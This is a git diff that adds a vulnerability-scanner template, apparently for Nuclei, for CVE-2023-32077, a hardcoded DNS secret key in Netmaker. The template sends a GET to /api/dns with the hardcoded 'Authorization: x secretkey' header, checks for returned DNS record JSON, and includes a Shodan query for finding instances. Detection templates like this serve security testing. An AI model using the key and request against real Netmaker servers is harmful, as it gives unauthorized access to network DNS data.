diff --git a/http/cves/2023/CVE-2023-32077.yaml b/http/cves/2023/CVE-2023-32077.yaml new file mode 100644 index 0000000000..779bf77a5c --- /dev/null +++ b/http/cves/2023/CVE-2023-32077.yaml @@ -0,0 +1,39 @@ +id: CVE-2023-32077 + +info: + name: Netmaker - Hardcoded DNS Secret Key + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-32077 + cwe-id: CWE-321,CWE-798 + epss-score: 0.0006 + epss-percentile: 0.24707 + cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: gravitl + product: netmaker + shodan-query: html:"netmaker" + tags: cve,cve2023,info-key,netmaker,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/api/dns" + + headers: + Authorization: "x secretkey" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header, "application/json")' + - 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")' + condition: and